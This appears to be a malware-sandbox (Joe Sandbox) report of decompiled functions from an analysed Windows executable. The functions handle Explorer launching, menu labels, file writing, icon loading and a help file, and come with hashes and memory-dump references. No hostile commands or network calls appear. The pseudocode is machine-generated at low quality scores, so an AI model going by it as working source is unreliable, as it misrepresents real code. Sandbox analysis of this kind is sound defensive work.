Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2864$FocusMessage$#3797#5280ChildClassNameParentPostSendlstrcmpi
String ID: EDIT
API String ID: 3096995850-3080729518
Opcode ID: 6bc370d862fadc54a3551427a171b4c1f59a2f81c16ba3febfdf5fc77d724a31
Instruction ID: 4e5fcc6acbc7569e47a316d3ef0bed57315a39c88df923880ae25359ef0e8ee3
Opcode Fuzzy Hash: 6bc370d862fadc54a3551427a171b4c1f59a2f81c16ba3febfdf5fc77d724a31
Instruction Fuzzy Hash: 1C21DE32610604BBDB247B77DC49F6B3779AF8A341F10883AF542A35E1D778D8649B08

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1F6, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0041F1F6(void* __ecx) {
				void* __esi;
				void* _t19;
				void* _t20;
				char** _t21;
				void* _t22;
				char* _t34;
				void* _t36;

				_t19 = E0043E4E0(0x441d04, _t36);
				_push(0x421);
				L0043DFA6();
				if(_t19 != 0) {
					_push("/select,\"");
					L0043DE26();
					 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
					_push("${>n");
					_push(_t19);
					_t20 = _t36 - 0x14;
					_push(_t20);
					L0043E282();
					_push("\"");
					_push(_t20);
					_t21 = _t36 - 0x10;
					 *(_t36 - 4) = 1;
					_push(_t21);
					L0043DE20();
					_t34 =  *_t21;
					 *(_t36 - 4) = 2;
					_t22 = L004044C9(_t21, _t36 - 0x18, _t34);
					if(_t22 != 0) {
						_t22 =  *(_t22 + 0x20);
					}
					_t19 = ShellExecuteA(_t22, "open", "explorer.exe", _t34, 0, 5);
					 *(_t36 - 4) = 1;
					L0043DD36();
					 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
					L0043DD36();
					 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
					L0043DD36();
				}
				L0043E2FA();
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t19;
			}

0x0041f1fb
0x0041f206
0x0041f20b
0x0041f212
0x0041f219
0x0041f221
0x0041f226
0x0041f22a
0x0041f22f
0x0041f230
0x0041f233
0x0041f234
0x0041f239
0x0041f23e
0x0041f23f
0x0041f242
0x0041f246
0x0041f247
0x0041f24c
0x0041f24e
0x0041f252
0x0041f259
0x0041f25b
0x0041f25b
0x0041f26e
0x0041f277
0x0041f27b
0x0041f280
0x0041f287
0x0041f28c
0x0041f293
0x0041f298
0x0041f29b
0x0041f2a4
0x0041f2ac

APIs

__EH_prolog.LIBCMT ref: 0041F1FB
#4055.MFC42(00000421), ref: 0041F20B
#537.MFC42(/select,",?,00000421), ref: 0041F221
#922.MFC42(00000421,00000000,${>n,/select,",?,00000421), ref: 0041F234
#924.MFC42(?,00000000,004548B8,00000421,00000000,${>n,/select,",?,00000421), ref: 0041F247
ShellExecuteA.SHELL32(00000000,open,explorer.exe,?,00000000,00000005), ref: 0041F26E
#800.MFC42(?,00000000,00000005,?,00000421), ref: 0041F27B
#800.MFC42(?,00000000,00000005,?,00000421), ref: 0041F287
#800.MFC42(?,00000000,00000005,?,00000421), ref: 0041F293
#5161.MFC42(00000421), ref: 0041F29B

Strings

open, xrefs: 0041F268
/select,", xrefs: 0041F219
${>n, xrefs: 0041F22A
explorer.exe, xrefs: 0041F263

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#4055#5161#537#922#924ExecuteH_prologShell
String ID: ${>n$/select,"$explorer.exe$open
API String ID: 682272949-2604038753
Opcode ID: 52f82f90beef8db5995bdc2703380edd49ba869a6ec1031d9ba9344e98fbd39b
Instruction ID: 1a375c3a1a99139046450a7a1fe31146c13ed73abeb3b8490a23ee0cf79039e2
Opcode Fuzzy Hash: 52f82f90beef8db5995bdc2703380edd49ba869a6ec1031d9ba9344e98fbd39b
Instruction Fuzzy Hash: F311E7B1D00245AADB10F7A5DD06BEEBB789F55319F10015FF401B71D2DBBC5A08C669

Uniqueness

Uniqueness Score: -1.00%

Function 004188B4, Relevance: 24.5, APIs: 6, Strings: 8, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E004188B4(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x004188b4
0x004188be
0x004188c3
0x004188cd
0x004188d2
0x004188dc
0x004188e1
0x004188eb
0x004188f0
0x004188fa
0x004188ff
0x00418909
0x0041890e

APIs

#537.MFC42(None,004188AF), ref: 004188BE
#537.MFC42(User defined,None,004188AF), ref: 004188CD
#537.MFC42(Open,User defined,None,004188AF), ref: 004188DC
#537.MFC42(Print,Open,User defined,None,004188AF), ref: 004188EB
#537.MFC42(Explore,Print,Open,User defined,None,004188AF), ref: 004188FA
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,004188AF), ref: 00418909

Strings

Open, xrefs: 004188D2
SE, xrefs: 004188C8
E-mail, xrefs: 004188FF
Explore, xrefs: 004188F0
Print, xrefs: 004188E1
User defined, xrefs: 004188C3
None, xrefs: 004188B4
SE, xrefs: 004188B9

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: E-mail$Explore$None$Open$Print$User defined$SE$SE
API String ID: 4256512136-2891978170
Opcode ID: d21227f8dcd24c2f2545172f5f666970d50dc86f48fb4cad6cf92c6d8b92661d
Instruction ID: 62499ee41602d7bb0a4c6d1ec5dc37722d9a59901eb963447052dcfeeb6ed208
Opcode Fuzzy Hash: d21227f8dcd24c2f2545172f5f666970d50dc86f48fb4cad6cf92c6d8b92661d
Instruction Fuzzy Hash: 75D0AC10F80E44D145287E56E47353D5842CB9C7C7750A15FBD061E1D38DCC4A5C452D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA2F, Relevance: 24.5, APIs: 6, Strings: 8, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041BA2F(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x0041ba2f
0x0041ba39
0x0041ba3e
0x0041ba48
0x0041ba4d
0x0041ba57
0x0041ba5c
0x0041ba66
0x0041ba6b
0x0041ba75
0x0041ba7a
0x0041ba84
0x0041ba89

APIs

#537.MFC42(None,0041BA2A), ref: 0041BA39
#537.MFC42(User defined,None,0041BA2A), ref: 0041BA48
#537.MFC42(Open,User defined,None,0041BA2A), ref: 0041BA57
#537.MFC42(Print,Open,User defined,None,0041BA2A), ref: 0041BA66
#537.MFC42(Explore,Print,Open,User defined,None,0041BA2A), ref: 0041BA75
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,0041BA2A), ref: 0041BA84

Strings

Open, xrefs: 0041BA4D
xTE, xrefs: 0041BA34
E-mail, xrefs: 0041BA7A
|TE, xrefs: 0041BA43
Explore, xrefs: 0041BA6B
Print, xrefs: 0041BA5C
User defined, xrefs: 0041BA3E
None, xrefs: 0041BA2F

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: E-mail$Explore$None$Open$Print$User defined$xTE$|TE
API String ID: 4256512136-3308549982
Opcode ID: a8e9cae7499d3ca04c8e4de0133e0d206f488b7c76653715f1e325c00be744f2
Instruction ID: 55850c7c3b5e04823ced849e43447ce60dbb7989911fb11bc189d81d950b7f60
Opcode Fuzzy Hash: a8e9cae7499d3ca04c8e4de0133e0d206f488b7c76653715f1e325c00be744f2
Instruction Fuzzy Hash: F2D0B210F90D405545187ED5F43373D5842C7DD7CBB51A15F7D411E1D38E4C5A5D452D

Uniqueness

Uniqueness Score: -1.00%

Function 004275DF, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 96
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E004275DF(void* __eflags) {
				intOrPtr* _t37;
				intOrPtr* _t40;
				intOrPtr* _t42;
				int _t48;
				void* _t70;
				void* _t72;

				E0043E4E0(0x442d78, _t72);
				L0043DDD8();
				_push(_t72 - 0x2c);
				 *(_t72 - 4) = 0;
				L0043E4A4();
				_t37 = E004290DB( *((intOrPtr*)(_t72 + 0xc)), _t72 - 0x18, _t72 - 0x2c);
				 *(_t72 - 4) = 1;
				_t40 = E00429098( *((intOrPtr*)(_t72 + 0xc)), _t72 - 0x14, _t72 - 0x2c);
				 *(_t72 - 4) = 2;
				_t42 = E00429029(_t72 + 0xc, 0xe05c);
				_push( *((intOrPtr*)(_t72 + 0x14)));
				 *(_t72 - 4) = 3;
				_push( *((intOrPtr*)(_t72 + 0x18)));
				_push( *((intOrPtr*)(_t72 + 0x10)));
				_push( *_t37);
				_push( *_t40);
				_push( *_t42);
				_push(_t72 - 0x10);
				L0043E174();
				 *(_t72 - 4) = 2;
				L0043DD36();
				 *(_t72 - 4) = 1;
				L0043DD36();
				 *(_t72 - 4) = 0;
				L0043DD36();
				_t70 = CreateFileA( *(_t72 + 8), 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t70 != 0xffffffff) {
					_t48 = WriteFile(_t70,  *(_t72 - 0x10),  *( *(_t72 - 0x10) - 8), _t72 - 0x1c, 0);
					_push(_t70);
					if(_t48 != 0) {
						CloseHandle();
						E0042AAFA( *(_t72 + 8));
						_push(1);
						_pop(0);
					} else {
						CloseHandle();
					}
				}
				 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
				return 0;
			}

0x004275e4
0x004275f2
0x004275ff
0x00427600
0x00427603
0x00427610
0x0042761a
0x00427623
0x00427633
0x00427637
0x0042763f
0x00427644
0x00427648
0x0042764b
0x0042764e
0x00427650
0x00427652
0x00427656
0x00427657
0x00427662
0x00427666
0x0042766e
0x00427672
0x0042767a
0x0042767d
0x0042769a
0x0042769f
0x004276af
0x004276b7
0x004276b8
0x004276c2
0x004276cb
0x004276d1
0x004276d3
0x004276ba
0x004276ba
0x004276ba
0x004276b8
0x004276d4
0x004276db
0x004276e8
0x004276f0

APIs

__EH_prolog.LIBCMT ref: 004275E4
#540.MFC42 ref: 004275F2
#6673.MFC42(?), ref: 00427603

Part of subcall function 004290DB: GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,00455AE8,00000032,00000000,?,?,00429D29,?,?,?,?), ref: 004290FD
Part of subcall function 004290DB: #537.MFC42(00455AE8,?,00429D29,?,?,?,?), ref: 00429107

Part of subcall function 00429098: GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
Part of subcall function 00429098: CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
Part of subcall function 00429098: #537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#2818.MFC42(?,?,00000000,00000000,?,?,?,?,?,?), ref: 00427657
#800.MFC42(?,?,?,?,?,?,?,?,?,?), ref: 00427666
#800.MFC42(?,?,?,?,?,?,?,?,?,?), ref: 00427672
#800.MFC42(?,?,?,?,?,?,?,?,?,?), ref: 0042767D
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00427694
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004276AF
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004276BA
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004276C2
#800.MFC42(?,?,?,?,?,?,?,?,?,?), ref: 004276DB

Strings

x-D, xrefs: 004275DF

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537$CloseFileFormatHandle$#1168#2818#540#6673BuffCharCreateDateH_prologLoadStringTimeUpperWrite
String ID: x-D
API String ID: 2788149937-4097327004
Opcode ID: 400d082385d21d049317d783a9442f1b225247440449403e0a3a03c33a10ab4e
Instruction ID: 8670b15b30c493a70c5479378da383e79abe782c95bf9aa93e95971539482b84
Opcode Fuzzy Hash: 400d082385d21d049317d783a9442f1b225247440449403e0a3a03c33a10ab4e
Instruction Fuzzy Hash: 7B319E72900118FFDB11EFA8DC85AEEBBB8EF19314F00415AF911A3191DB785E04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041F66D, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 90
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041F66D(void* __ecx, void* __edx) {
				char _v360;
				void* __esi;
				void* __ebp;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				intOrPtr _t18;
				long _t30;
				void* _t40;
				int _t42;
				void* _t44;

				_t40 = __edx;
				_t44 = __ecx;
				L0043DF94();
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(__ecx);
				_push(0x3e8);
				_t15 = L00404F47(_t14, __ecx + 0x9c, __ecx);
				_push(1);
				_push(0);
				_t30 = _t44 + 0x90;
				_push(0x21);
				_push(0x20);
				_push(0x20);
				L0043E3B4();
				_push(0x499);
				L0043E066();
				 *((intOrPtr*)(_t44 + 0x98)) = _t15;
				_t16 = L004044C9(_t15, _t44, _t44);
				_push(0x43b);
				_t42 = _t16 + 0x6c;
				L0043E066();
				if(_t42 != 0) {
					_t42 =  *(_t42 + 4);
				}
				SendMessageA( *(_t16 + 0x20), 0x30, _t42, 1);
				_push(0x4554b8);
				_push(0x42d);
				L0043E06C();
				_t18 =  *((intOrPtr*)(_t44 + 0x98));
				if(_t30 != 0) {
					_t30 =  *(_t30 + 4);
				}
				_push(SendMessageA( *(_t18 + 0x20), 0x1003, 0, _t30));
				L0043E3AE();
				E0041F818(_t44, _t40);
				if(SendMessageA( *( *((intOrPtr*)(_t44 + 0x98)) + 0x20), 0x1004, 0, 0) == 0) {
					GetSystemDirectoryA( &_v360, 0x105);
					lstrcatA( &_v360, "\\shell32.dll");
					_push( &_v360);
					_push(0x42d);
					L0043E06C();
					E0041F818(_t44, _t40);
				}
				return 0;
			}

0x0041f66d
0x0041f677
0x0041f679
0x0041f67e
0x0041f680
0x0041f685
0x0041f68a
0x0041f68f
0x0041f690
0x0041f69b
0x0041f6a0
0x0041f6a2
0x0041f6a4
0x0041f6aa
0x0041f6ac
0x0041f6ae
0x0041f6b2
0x0041f6b7
0x0041f6be
0x0041f6c3
0x0041f6c9
0x0041f6d0
0x0041f6d7
0x0041f6da
0x0041f6e1
0x0041f6e3
0x0041f6e3
0x0041f6f4
0x0041f6fb
0x0041f700
0x0041f703
0x0041f708
0x0041f710
0x0041f712
0x0041f712
0x0041f722
0x0041f723
0x0041f72a
0x0041f745
0x0041f751
0x0041f761
0x0041f76d
0x0041f76e
0x0041f76f
0x0041f776
0x0041f776
0x0041f787

APIs

#4710.MFC42 ref: 0041F679
#2096.MFC42(00000020,00000020,00000021,00000000,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F6B2
#3092.MFC42(00000499,00000020,00000020,00000021,00000000,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F6BE
#3092.MFC42(0000043B,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F6DA
SendMessageA.USER32(?,00000030,-0000006C,00000001), ref: 0041F6F4
#5953.MFC42(0000042D,004554B8,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F703
SendMessageA.USER32(?,00001003,00000000,?), ref: 0041F720
#2862.MFC42(00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F723
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0041F741
GetSystemDirectoryA.KERNEL32 ref: 0041F751
lstrcatA.KERNEL32(?,\shell32.dll,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F761
#5953.MFC42(0000042D,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041F76F

Strings

\shell32.dll, xrefs: 0041F75B

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: MessageSend$#3092#5953$#2096#2862#4710DirectorySystemlstrcat
String ID: \shell32.dll
API String ID: 2445196989-3783449302
Opcode ID: e184c3c436f6f1e71ffdbc978936efb3d803318cdcf281116a4fd23a5638243c
Instruction ID: 5539777ea0326a4cb018b459cb392cb0a15c47d8503afc756ea100e2d2f3f513
Opcode Fuzzy Hash: e184c3c436f6f1e71ffdbc978936efb3d803318cdcf281116a4fd23a5638243c
Instruction Fuzzy Hash: B421F9713907047BE620B7729C87FAA7659DF84B04F01042EF7456B2D2DFEDA8894758

Uniqueness

Uniqueness Score: -1.00%

Function 00422E3C, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00422E3C() {
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t30;
				void* _t42;

				_t24 = E0043E4E0(0x442584, _t42);
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_push("::/");
				L0043DE26();
				_push("bpk.chm");
				_t25 = _t42 - 0x18;
				_push(0x4558c8);
				_push(_t25);
				 *(_t42 - 4) = 1;
				L0043DE20();
				_push(_t24);
				_push(_t25);
				_t26 = _t42 - 0x14;
				 *(_t42 - 4) = 2;
				_push(_t26);
				L0043E282();
				 *(_t42 - 4) = 3;
				_push(_t42 + 8);
				_push(_t26);
				_push(_t42 - 0x10);
				L0043E282();
				_t30 = L0042C92C(GetDesktopWindow(),  *((intOrPtr*)(_t42 - 0x10)), 1, 0);
				L0043DD36();
				 *(_t42 - 4) = 2;
				L0043DD36();
				 *(_t42 - 4) = 1;
				L0043DD36();
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				L0043DD36();
				 *(_t42 - 4) =  *(_t42 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t30;
			}

0x00422e41
0x00422e4a
0x00422e4e
0x00422e56
0x00422e5d
0x00422e62
0x00422e65
0x00422e6a
0x00422e6b
0x00422e6f
0x00422e74
0x00422e75
0x00422e76
0x00422e79
0x00422e7d
0x00422e7e
0x00422e86
0x00422e8a
0x00422e8b
0x00422e8f
0x00422e90
0x00422ea3
0x00422eab
0x00422eb3
0x00422eb7
0x00422ebf
0x00422ec3
0x00422ec8
0x00422ecf
0x00422ed4
0x00422edb
0x00422ee4
0x00422eec

APIs

__EH_prolog.LIBCMT ref: 00422E41
#537.MFC42(::/), ref: 00422E56
#924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
#922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
#922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
GetDesktopWindow.USER32 ref: 00422E9C
#800.MFC42 ref: 00422EAB
#800.MFC42 ref: 00422EB7
#800.MFC42 ref: 00422EC3
#800.MFC42 ref: 00422ECF
#800.MFC42 ref: 00422EDB

Strings

bpk.chm, xrefs: 00422E5D
::/, xrefs: 00422E4E

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#922$#537#924DesktopH_prologWindow
String ID: ::/$bpk.chm
API String ID: 1943509954-2471876148
Opcode ID: 330946893fc0247122092e15f6b359f6f33634cb2bca5c83113eb70742dbad66
